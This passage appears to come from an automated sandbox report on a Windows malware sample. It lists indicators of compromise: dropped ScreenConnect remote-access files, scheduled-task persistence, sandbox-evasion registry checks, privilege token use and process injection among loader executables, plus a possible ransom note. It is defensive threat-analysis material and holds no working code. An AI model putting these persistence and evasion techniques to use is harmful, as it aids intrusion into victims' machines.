Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\app.config msiexec.exe -
Drops file in Windows directory 17 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI21E6.tmp msiexec.exe File opened for modification C:\Windows\Tasks\snihdww.job kdMujZh.exe File opened for modification C:\Windows\Installer\e59210b.msi msiexec.exe File created C:\Windows\Installer\SourceHash{E7FFB52F-03E7-9BA2-D37A-094243CEF563} msiexec.exe File opened for modification C:\Windows\Installer\MSI2225.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI23CC.tmp msiexec.exe File created C:\Windows\Installer\wix{E7FFB52F-03E7-9BA2-D37A-094243CEF563}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Tasks\skotes.job 1n70A2.exe File created C:\Windows\Tasks\snihdww.job kdMujZh.exe File created C:\Windows\Installer\e59210b.msi msiexec.exe File created C:\Windows\Installer\e59210d.msi msiexec.exe File created C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000700000002416d-1917.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 5044 2492 WerFault.exe 96 4064 932 WerFault.exe 102 4956 1732 WerFault.exe 106 2900 1768 WerFault.exe 110 5964 3720 WerFault.exe 176 5976 2504 WerFault.exe 187 6012 5216 WerFault.exe 169 1152 964 WerFault.exe 197 -
System Location Discovery: System Language Discovery 1 TTPs 50 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apisysDirectx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2O4054.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3Z15F.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MAl7pjE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b1X18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f9ec9ef64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kdMujZh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sQ3DZPU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1EoH8b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language snihdww.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apisysDirectx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 078fa63d7b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1n70A2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000c9f51e24b17fce490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000c9f51e240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900c9f51e24000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dc9f51e24000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000c9f51e2400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8f9ec9ef64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8f9ec9ef64.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5788 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 42 Go-http-client/1.1 -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe -
Modifies registry class 37 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\ = "ScreenConnect Client (91b7d375130f294a) Credential Provider" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Version = "402849799" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductName = "ScreenConnect Client (91b7d375130f294a)" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\PackageCode = "F25BFF7E7E302AB93DA7902434EC5F36" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductIcon = "C:\\Windows\\Installer\\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\\DefaultIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\URL Protocol msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\UseOriginalUrlEncoding = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Language = "1033" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell msiexec.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 5544 notepad.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2256 schtasks.exe 2924 schtasks.exe 5900 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 968 apisysDirectx.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2620 1n70A2.exe 2620 1n70A2.exe 4232 skotes.exe 4232 skotes.exe 2364 2O4054.exe 2364 2O4054.exe 2364 2O4054.exe 2364 2O4054.exe 2364 2O4054.exe 2364 2O4054.exe 432 3Z15F.exe 432 3Z15F.exe 3992 skotes.exe 3992 skotes.exe 4680 YMci4Rc.exe 4680 YMci4Rc.exe 4680 YMci4Rc.exe 4680 YMci4Rc.exe 3188 9aiiMOQ.exe 3188 9aiiMOQ.exe 3188 9aiiMOQ.exe 3188 9aiiMOQ.exe 4852 NL58452.exe 4852 NL58452.exe 4852 NL58452.exe 4852 NL58452.exe 2356 f3Ypd8O.exe 2356 f3Ypd8O.exe 2356 f3Ypd8O.exe 2356 f3Ypd8O.exe 4668 kdMujZh.exe 4668 kdMujZh.exe 3628 skotes.exe 3628 skotes.exe 4668 kdMujZh.exe 4668 kdMujZh.exe 3432 snihdww.exe 3432 snihdww.exe 5048 MAl7pjE.exe 5048 MAl7pjE.exe 1508 sQ3DZPU.exe 1508 sQ3DZPU.exe 5048 MAl7pjE.exe 5048 MAl7pjE.exe 5048 MAl7pjE.exe 5048 MAl7pjE.exe 4192 msiexec.exe 4192 msiexec.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 4004 ScreenConnect.ClientService.exe 3404 powershell.exe 3404 powershell.exe 3404 powershell.exe 3824 powershell.exe 3824 powershell.exe 3824 powershell.exe 5912 powershell.exe 5912 powershell.exe 5912 powershell.exe 1188 TempLN6GYDZ7JMP9CYUV0ATJO7SJVARZH10O.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 380 a1EoH8b.exe Token: SeShutdownPrivilege 932 msiexec.exe Token: SeIncreaseQuotaPrivilege 932 msiexec.exe Token: SeSecurityPrivilege 4192 msiexec.exe Token: SeCreateTokenPrivilege 932 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 932 msiexec.exe Token: SeLockMemoryPrivilege 932 msiexec.exe Token: SeIncreaseQuotaPrivilege 932 msiexec.exe Token: SeMachineAccountPrivilege 932 msiexec.exe Token: SeTcbPrivilege 932 msiexec.exe Token: SeSecurityPrivilege 932 msiexec.exe Token: SeTakeOwnershipPrivilege 932 msiexec.exe Token: SeLoadDriverPrivilege 932 msiexec.exe Token: SeSystemProfilePrivilege 932 msiexec.exe Token: SeSystemtimePrivilege 932 msiexec.exe Token: SeProfSingleProcessPrivilege 932 msiexec.exe Token: SeIncBasePriorityPrivilege 932 msiexec.exe Token: SeCreatePagefilePrivilege 932 msiexec.exe Token: SeCreatePermanentPrivilege 932 msiexec.exe Token: SeBackupPrivilege 932 msiexec.exe Token: SeRestorePrivilege 932 msiexec.exe Token: SeShutdownPrivilege 932 msiexec.exe Token: SeDebugPrivilege 932 msiexec.exe Token: SeAuditPrivilege 932 msiexec.exe Token: SeSystemEnvironmentPrivilege 932 msiexec.exe Token: SeChangeNotifyPrivilege 932 msiexec.exe Token: SeRemoteShutdownPrivilege 932 msiexec.exe Token: SeUndockPrivilege 932 msiexec.exe Token: SeSyncAgentPrivilege 932 msiexec.exe Token: SeEnableDelegationPrivilege 932 msiexec.exe Token: SeManageVolumePrivilege 932 msiexec.exe Token: SeImpersonatePrivilege 932 msiexec.exe Token: SeCreateGlobalPrivilege 932 msiexec.exe Token: SeCreateTokenPrivilege 932 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 932 msiexec.exe Token: SeLockMemoryPrivilege 932 msiexec.exe Token: SeIncreaseQuotaPrivilege 932 msiexec.exe Token: SeMachineAccountPrivilege 932 msiexec.exe Token: SeTcbPrivilege 932 msiexec.exe Token: SeSecurityPrivilege 932 msiexec.exe Token: SeTakeOwnershipPrivilege 932 msiexec.exe Token: SeLoadDriverPrivilege 932 msiexec.exe Token: SeSystemProfilePrivilege 932 msiexec.exe Token: SeSystemtimePrivilege 932 msiexec.exe Token: SeProfSingleProcessPrivilege 932 msiexec.exe Token: SeIncBasePriorityPrivilege 932 msiexec.exe Token: SeCreatePagefilePrivilege 932 msiexec.exe Token: SeCreatePermanentPrivilege 932 msiexec.exe Token: SeBackupPrivilege 932 msiexec.exe Token: SeRestorePrivilege 932 msiexec.exe Token: SeShutdownPrivilege 932 msiexec.exe Token: SeDebugPrivilege 932 msiexec.exe Token: SeAuditPrivilege 932 msiexec.exe Token: SeSystemEnvironmentPrivilege 932 msiexec.exe Token: SeChangeNotifyPrivilege 932 msiexec.exe Token: SeRemoteShutdownPrivilege 932 msiexec.exe Token: SeUndockPrivilege 932 msiexec.exe Token: SeSyncAgentPrivilege 932 msiexec.exe Token: SeEnableDelegationPrivilege 932 msiexec.exe Token: SeManageVolumePrivilege 932 msiexec.exe Token: SeImpersonatePrivilege 932 msiexec.exe Token: SeCreateGlobalPrivilege 932 msiexec.exe Token: SeCreateTokenPrivilege 932 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 932 msiexec.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 2620 1n70A2.exe 932 msiexec.exe 932 msiexec.exe 3180 078fa63d7b.exe 3180 078fa63d7b.exe 3180 078fa63d7b.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3180 078fa63d7b.exe 3180 078fa63d7b.exe 3180 078fa63d7b.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 624 wrote to memory of 4228 624 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 86 PID 624 wrote to memory of 4228 624 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 86 PID 624 wrote to memory of 4228 624 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 86 PID 4228 wrote to memory of 2620 4228 b1X18.exe 88 PID 4228 wrote to memory of 2620 4228 b1X18.exe 88 PID 4228 wrote to memory of 2620 4228 b1X18.exe 88 PID 2620 wrote to memory of 4232 2620 1n70A2.exe 89 PID 2620 wrote to memory of 4232 2620 1n70A2.exe 89 PID 2620 wrote to memory of 4232 2620 1n70A2.exe 89 PID 4228 wrote to memory of 2364 4228 b1X18.exe 90 PID 4228 wrote to memory of 2364 4228 b1X18.exe 90 PID 4228 wrote to memory of 2364 4228 b1X18.exe 90 PID 624 wrote to memory of 432 624 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 92 PID 624 wrote to memory of 432 624 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 92 PID 624 wrote to memory of 432 624 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe 92 PID 4232 wrote to memory of 3564 4232 skotes.exe 95 PID 4232 wrote to memory of 3564 4232 skotes.exe 95 PID 4232 wrote to memory of 2492 4232 skotes.exe 96 PID 4232 wrote to memory of 2492 4232 skotes.exe 96 PID 4232 wrote to memory of 2492 4232 skotes.exe 96 PID 2492 wrote to memory of 1680 2492 YMci4Rc.exe 97 PID 2492 wrote to memory of 1680 2492 YMci4Rc.exe 97 PID 2492 wrote to memory of 1680 2492 YMci4Rc.exe 97 PID 2492 wrote to memory of 4680 2492 YMci4Rc.exe 98 PID 2492 wrote to memory of 4680 2492 YMci4Rc.exe 98 PID 2492 wrote to memory of 4680 2492 YMci4Rc.exe 98 PID 2492 wrote to memory of 4680 2492 YMci4Rc.exe 98 PID 2492 wrote to memory of 4680 2492 YMci4Rc.exe 98 PID 2492 wrote to memory of 4680 2492 YMci4Rc.exe 98 PID 2492 wrote to memory of 4680 2492 YMci4Rc.exe 98 PID 2492 wrote to memory of 4680 2492 YMci4Rc.exe 98 PID 2492 wrote to memory of 4680 2492 YMci4Rc.exe 98 PID 4232 wrote to memory of 932 4232 skotes.exe 102 PID 4232 wrote to memory of 932 4232 skotes.exe 102 PID 4232 wrote to memory of 932 4232 skotes.exe 102 PID 932 wrote to memory of 3188 932 9aiiMOQ.exe 103 PID 932 wrote to memory of 3188 932 9aiiMOQ.exe 103 PID 932 wrote to memory of 3188 932 9aiiMOQ.exe 103 PID 932 wrote to memory of 3188 932 9aiiMOQ.exe 103 PID 932 wrote to memory of 3188 932 9aiiMOQ.exe 103 PID 932 wrote to memory of 3188 932 9aiiMOQ.exe 103 PID 932 wrote to memory of 3188 932 9aiiMOQ.exe 103 PID 932 wrote to memory of 3188 932 9aiiMOQ.exe 103 PID 932 wrote to memory of 3188 932 9aiiMOQ.exe 103 PID 4232 wrote to memory of 1732 4232 skotes.exe 106 PID 4232 wrote to memory of 1732 4232 skotes.exe 106 PID 4232 wrote to memory of 1732 4232 skotes.exe 106 PID 1732 wrote to memory of 4852 1732 NL58452.exe 107 PID 1732 wrote to memory of 4852 1732 NL58452.exe 107 PID 1732 wrote to memory of 4852 1732 NL58452.exe 107 PID 1732 wrote to memory of 4852 1732 NL58452.exe 107 PID 1732 wrote to memory of 4852 1732 NL58452.exe 107 PID 1732 wrote to memory of 4852 1732 NL58452.exe 107 PID 1732 wrote to memory of 4852 1732 NL58452.exe 107 PID 1732 wrote to memory of 4852 1732 NL58452.exe 107 PID 1732 wrote to memory of 4852 1732 NL58452.exe 107 PID 4232 wrote to memory of 1768 4232 skotes.exe 110 PID 4232 wrote to memory of 1768 4232 skotes.exe 110 PID 4232 wrote to memory of 1768 4232 skotes.exe 110 PID 1768 wrote to memory of 2356 1768 f3Ypd8O.exe 111 PID 1768 wrote to memory of 2356 1768 f3Ypd8O.exe 111 PID 1768 wrote to memory of 2356 1768 f3Ypd8O.exe 111 PID 1768 wrote to memory of 2356 1768 f3Ypd8O.exe 111 PID 1768 wrote to memory of 2356 1768 f3Ypd8O.exe 111 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe"C:\Users\Admin\AppData\Local\Temp\2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:624 -
